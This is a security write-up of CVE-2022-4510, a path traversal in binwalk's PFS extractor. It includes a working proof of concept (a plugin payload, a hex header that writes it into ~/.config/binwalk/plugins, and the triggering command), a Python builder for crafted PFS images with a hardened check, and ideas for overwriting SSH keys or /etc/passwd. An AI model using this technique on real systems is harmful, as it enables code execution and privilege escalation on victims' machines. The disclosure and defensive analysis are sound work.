Introduction
According to the NVD description, a path traversal vulnerability was identified in binwalk from version 2.1.2b through 2.3.3 inclusive (fixed in 2.3.4). By crafting a malicious PFS filesystem image, an attacker can make binwalk's PFS extractor write files to arbitrary locations when binwalk is run in extraction mode (-e). "Remote" here means the attacker only has to get the victim to run binwalk on a file they supply; the write primitive can then be turned into arbitrary code execution on the machine running binwalk.
What is a PFS file
The PFS handled by binwalk's unpfs plugin is not the PhotoFiltre Studio selection format (a plain-text list of polygon coordinates that merely shares the extension). It is a simple flat filesystem image found in some embedded-device firmware: a 16-byte header that starts with the magic string PFS/0.9 and ends with the number of files, followed by a table of fixed-width entries (a NUL-padded file name plus a few bytes of metadata, including the file size), followed by the file contents concatenated in table order. The format is described at the link below.
PFS file format
https://lekensteyn.nl/files/pfs/pfs.txt
Analyzing the source code
The PFS extractor plugin (src/binwalk/plugins/unpfs.py) was merged into binwalk in 2017, with some modifications. Its extractor method looks like this:
def extractor(self, fname):
    fname = os.path.abspath(fname)
    out_dir = binwalk.core.common.unique_file_name(os.path.join(os.path.dirname(fname), "pfs-root"))
    try:
        with PFS(fname) as fs:  # parse the PFS header and entry table
            data = open(fname, 'rb')
            data = binwalk.core.common.BlockFile(fname, 'rb')
            data.seek(fs.get_end_of_meta_data())  # file bodies start right after the entry table
            for entry in fs.entries():
                # '..' components in entry.fname are kept as-is: join() does not normalise
                outfile_path = os.path.join(out_dir, entry.fname)
                # string-prefix check only; "<out_dir>/../../../x" still starts with out_dir
                if not outfile_path.startswith(out_dir):
                    binwalk.core.common.warning("Unpfs extractor detected directory traversal attempt for file: '%s'. Refusing to extract." % outfile_path)
                else:
                    self._create_dir_from_fname(outfile_path)
                    outfile = binwalk.core.common.BlockFile(outfile_path, 'wb')
                    outfile.write(data.read(entry.fsize))
                    outfile.close()
            data.close()
    except KeyboardInterrupt as e:
        raise e
The problem is that os.path.join only concatenates; it does not normalise ".." components. For an entry named ../../../.config/binwalk/plugins/malwalk.py, outfile_path becomes <out_dir>/../../../.config/binwalk/plugins/malwalk.py, which still begins with the out_dir string, so the startswith check never rejects it, and _create_dir_from_fname plus BlockFile(outfile_path, 'wb') create the file wherever the ".." components lead. The check is also a string-prefix comparison rather than a path-component one, so a sibling directory whose name merely starts with pfs-root would pass it too.
By crafting a PFS file whose entry names contain ../ components, we can therefore make binwalk write files outside its extraction directory.
PoC
binwalk lets users write their own plugins against its API: every .py file in the $HOME/.config/binwalk/plugins/ directory is loaded when binwalk starts, and a class deriving from binwalk.core.plugin.Plugin has its init() method called as soon as it is loaded. That is all an attacker needs once they can write into that directory.
Malicious code:
import binwalk.core.plugin

class MaliciousExtractor(binwalk.core.plugin.Plugin):
    # init() runs when binwalk loads the plugin, with the privileges of the user
    # who invoked binwalk; the print is a harmless stand-in for a real payload
    def init(self):
        print("baimao")
Save it as malwalk.py, open the file in a hex editor such as WinHex, and insert the following bytes directly in front of the Python source. They form the PFS header (magic PFS/0.9, file count 1 in the last two bytes) and a single entry whose name field holds ../../../.config/binwalk/plugins/malwalk.py, NUL-padded, followed by 12 bytes of entry metadata that include the file size; that size must match the length of the Python payload that follows (0xc1 = 193 bytes in this dump), because the extractor reads exactly that many bytes after the table:
5046 532f 302e 3900 0000 0000 0000 0100
2e2e 2f2e 2e2f 2e2e 2f2e 636f 6e66 6967
2f62 696e 7761 6c6b 2f70 6c75 6769 6e73
2f6d 616c 7761 6c6b 2e70 7900 0000 0000
0000 0000 0000 0000 0000 0000 0000 0000
0000 0000 0000 0000 0000 0000 0000 0000
0000 0000 0000 0000 0000 0000 0000 0000
0000 0000 0000 0000 0000 0000 0000 0000
0000 0000 0000 0000 0000 0000 0000 0000
3412 0000 a000 0000 c100 0000
Save the result with a .pfs extension and add it to a zip archive (exp.zip). When the victim runs binwalk with extraction on that archive from their home directory, the zip is unpacked into _exp.zip.extracted/, the PFS inside it is extracted into a nested _<name>.extracted/pfs-root/ directory, and the three ../ components of the entry name climb back out to the directory binwalk was started in, so the entry is written to .config/binwalk/plugins/malwalk.py. The malicious plugin is then loaded and executed by binwalk, resulting in RCE:
cd ~
binwalk -M -e exp.zip
Code executed successfully: the plugin's init() runs and prints baimao when binwalk loads it.
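To make both the analysis above and the PoC concrete, here is an added example; it is my own code, not binwalk's and not the author's. It builds a PFS/0.9 image with the same layout as the hex dump (16-byte header with the file count in its last two bytes, a 128-byte NUL-padded name field, then 12 bytes of metadata whose last four bytes are taken to be the little-endian file size; the first eight metadata bytes are not needed here and are left zero), parses the image back the way the extractor does, and runs each entry through two checks: vulnerable_target, which reproduces the os.path.join + startswith logic from unpfs.py, and hardened_target, a replacement that resolves the path with realpath and compares path components with os.path.commonpath. The 128-byte field width, the function names, the constructed payload and the tmp/a/b/pfs-root nesting (which imitates binwalk's three-deep output directory so that ../../../ escapes it) are all assumptions of the example.

```python
"""Added example: PFS/0.9 image builder plus the vulnerable and a hardened
unpfs-style path check. Not binwalk's code; layout assumptions are in the lead-in."""
import os
import struct
import tempfile

MAGIC = b"PFS/0.9\x00"
NAME_FIELD = 128          # assumed name-field width, as in the hex dump above
META_LEN = 12             # metadata bytes after the name; last 4 = file size (assumed)
ENTRY_SIZE = NAME_FIELD + META_LEN


def build_pfs(entries):
    """Build a PFS/0.9 image from [(name, data), ...].

    Header: 8-byte magic, 6 zero bytes, little-endian uint16 file count.
    Table: one ENTRY_SIZE record per file. Data: file bodies, in table order.
    """
    header = MAGIC + b"\x00" * 6 + struct.pack("<H", len(entries))
    table = b""
    body = b""
    for name, data in entries:
        raw = name.encode()
        if len(raw) >= NAME_FIELD:
            raise ValueError("name too long for the name field")
        table += raw.ljust(NAME_FIELD, b"\x00")
        table += b"\x00" * (META_LEN - 4) + struct.pack("<I", len(data))
        body += data
    return header + table + body


def parse_pfs(blob):
    """Inverse of build_pfs: read the table, then slice the bodies sequentially,
    exactly as the extractor does after seeking to the end of the metadata."""
    if blob[:8] != MAGIC:
        raise ValueError("not a PFS/0.9 image")
    count = struct.unpack("<H", blob[14:16])[0]
    data_pos = 16 + ENTRY_SIZE * count          # get_end_of_meta_data()
    entries = []
    for i in range(count):
        rec = blob[16 + i * ENTRY_SIZE: 16 + (i + 1) * ENTRY_SIZE]
        name = rec[:NAME_FIELD].rstrip(b"\x00").decode()
        size = struct.unpack("<I", rec[-4:])[0]
        entries.append((name, blob[data_pos:data_pos + size]))
        data_pos += size
    return entries


def vulnerable_target(out_dir, name):
    """The unpfs.py logic: join, then compare the *unnormalised* string prefix."""
    path = os.path.join(out_dir, name)
    return path if path.startswith(out_dir) else None


def where_it_lands(out_dir, name):
    """Where the vulnerable check would really write, once '..' is resolved."""
    path = vulnerable_target(out_dir, name)
    return None if path is None else os.path.normpath(path)


def hardened_target(out_dir, name):
    """Resolve symlinks and '..' first, then compare path components, not prefixes."""
    root = os.path.realpath(out_dir)
    path = os.path.realpath(os.path.join(root, name))
    return path if os.path.commonpath([root, path]) == root else None


def extract(blob, out_dir, target_fn):
    """Minimal extractor loop mirroring unpfs.py; returns the paths it wrote."""
    written = []
    for name, data in parse_pfs(blob):
        target = target_fn(out_dir, name)
        if target is None:
            continue                               # "Refusing to extract"
        os.makedirs(os.path.dirname(target), exist_ok=True)
        with open(target, "wb") as fh:
            fh.write(data)
        written.append(target)
    return written


def demo():
    """Run a crafted image through both checks in a scratch directory.
    Returns the written paths, relative to the scratch root, for each check."""
    payload = b'print("constructed payload")\n'    # constructed sample data
    image = build_pfs([("../../../outside.txt", payload), ("ok/inner.txt", b"benign")])
    with tempfile.TemporaryDirectory() as raw:
        tmp = os.path.realpath(raw)
        out_dir = os.path.join(tmp, "a", "b", "pfs-root")   # imitates the three-deep nesting
        os.makedirs(out_dir)
        vuln = [os.path.relpath(p, tmp) for p in extract(image, out_dir, vulnerable_target)]
        safe = [os.path.relpath(p, tmp) for p in extract(image, out_dir, hardened_target)]
    return vuln, safe


if __name__ == "__main__":
    print(demo())
```

Running demo() shows the vulnerable check writing outside.txt three levels above pfs-root while the hardened check writes only ok/inner.txt. hardened_target also rejects absolute entry names and sibling directories that merely share the pfs-root prefix, which the string comparison in the original would let through.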
Summary
The details of the CVE were disclosed on January 31, 2023. Beyond dropping ./.config/binwalk/plugins/malwalk.py, the same write primitive can overwrite other files, always with the privileges of the user running binwalk: for example ~/.ssh/id_rsa or authorized_keys of that user, or, if binwalk is run as root, /etc/passwd, for direct privilege escalation.
References:
https://nvd.nist.gov/vuln/detail/CVE-2022-4510
https://onekey.com/blog/security-advisory-remote-command-execution-in-binwalk